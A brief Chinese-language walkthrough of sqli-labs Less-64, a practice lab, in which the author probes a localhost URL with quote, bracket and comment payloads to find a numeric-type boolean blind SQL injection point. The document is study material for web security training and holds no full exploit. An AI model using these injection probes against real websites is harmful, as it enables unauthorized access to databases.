sqli-labs (less-64)
进入64关,输入
http://127.0.0.1/sql1/Less-64/?id=1
http://127.0.0.1/sql1/Less-64/?id=1'
没有任何错误信息,又是我们的老朋友Boolean盲注
http://127.0.0.1/sql1/Less-64/?id=1--+ #回显错误
http://127.0.0.1/sql1/Less-64/?id=1'--+ #回显错误
http://127.0.0.1/sql1/Less-64/?id=1"--+ #回显错误
http://127.0.0.1/sql1/Less-64/?id=1)--+ #回显错误
http://127.0.0.1/sql1/Less-64/?id=1))--+ #回显正常
所以判断为数字型注入,接下来的步骤我不加以赘述,具体过程请看我的less-5